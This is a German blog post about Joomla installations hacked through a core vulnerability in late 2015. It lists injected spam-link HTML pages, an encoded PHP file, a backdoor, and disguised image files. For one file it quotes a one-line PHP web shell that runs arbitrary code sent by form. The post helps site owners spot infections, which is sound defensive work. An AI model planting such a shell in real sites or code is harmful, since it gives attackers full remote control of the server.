Fremder Code auf der Webseite

Sicherheitslücke im Joomla-Core

"Hilfe mein Server wurde gehackt!"

Durch eine Sicherheitslücke im Joomla-Core konnte fremder Code eingeschleust werden.

Kurz vor Weihnachten 2015 wurden viele Joomla-Installationen angegriffen. Es gab auch sehr schnell ein Sicherheitsupdate, aber das musste erstmal installiert werden.

Wer zulange gewartet hat, hat dann auch prompt fremden Code auf seinem Server entdeckt. Meist aber erst, als der Server bereits als SPAM-Schleuder eifrig Mails versendet hat!

Auf betroffenen Servern habe ich jeweils mehr als eine eingeschleuste Datei gefunden, die Namen der Dateien ändern sich je nach Angreifer, einige Dateien findet man allerdings sehr oft.

gefundene Dateien mit Fremdcode

Hier wird selbstverständlich nur der Name angezeigt und nicht der bösartige Code verlinkt!

  • html-Datei im Root-Verzeichnis

    z.B.
    • golfclub_taunus_weilrod.html
    • anmelden_schnupperkurs.html

    Beinahe harmlos scheint die html-Datei. Diese enthält Links zu diversen Webseiten, auf die ich niemals freiwillig verweisen würde.

    Problematisch wird es, wenn diese Seiten von Google gefunden werden und Google den zugehörigen Links folgt. Dass diese fremden Webseiten unfreiwillig Backlinks erhalten ist schlimm genug, zusätzlich dazu befindet sich anschließend die gehackte Seite in "schlechter Nachbarschaft" und wird von Google entsprechend abgewertet.

  • html-Datei im Unterordner

    Diese html-Dateien befinden sich nicht nur im Hauptverzeichnis sondern auch in Unterordnern z.B.
    • Golf_abcleser/welche-bedeutung-hat-das-wort-greenfee.htmll
    • ...

  • blog69.php

    BASE64-codierter PHP-Code, vermutlich mit bösen Absichten

  • login.php

    PHP/Backdoor-Virus, infiziert weitere Dateien und ist insbesondere auf Windows-Rechnern ohne ausreichenden Antiviren-Schutz gefährlich. Info dazu von AVG-Antivirus

  • libraries/one_word.php

    PHP-Datei mit gefährlichen Inhalt: 
    <php eval($_POST['jerry46']);?>
    Bei Aufruf der Datei über ein Formular von einem fremden Rechner kann beliebiger PHP-Code eingeschleust und sofort ausgeführt werden. Damit kann weiterer bösartiger Code hochgeladen werden. Informationen zur Funktion eval() auf PHP.net

  • Bilddateien

    Dateien mit Endungen von Bilddateien, diese befinden sich passenderweise oft im Order images oder einem neuen Unterordner darin.
^